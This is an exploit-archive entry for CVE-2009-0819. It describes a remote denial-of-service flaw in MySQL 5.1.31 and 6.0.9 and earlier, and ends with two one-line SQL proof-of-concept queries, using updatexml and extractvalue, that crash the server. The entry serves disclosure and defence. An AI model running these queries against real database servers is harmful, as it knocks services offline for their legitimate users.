MySQL 6.0.9 - XPath Expression Remote Denial of Service
| EKU-ID: 37728 | CVE: CVE-2009-0819;OSVDB-52453 | OSVDB-ID: |
| Author: Shane Bester | Published: 2009-02-14 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 37728 | CVE: CVE-2009-0819;OSVDB-52453 | OSVDB-ID: |
| Author: Shane Bester | Published: 2009-02-14 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/33972/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions.
An attacker can exploit this issue to crash the application, denying access to legitimate users.
This issue affects:
MySQL 5.1.31 and earlier
MySQL 6.0.9 and earlier
select updatexml('','0/a','');
select extractvalue('','0/a');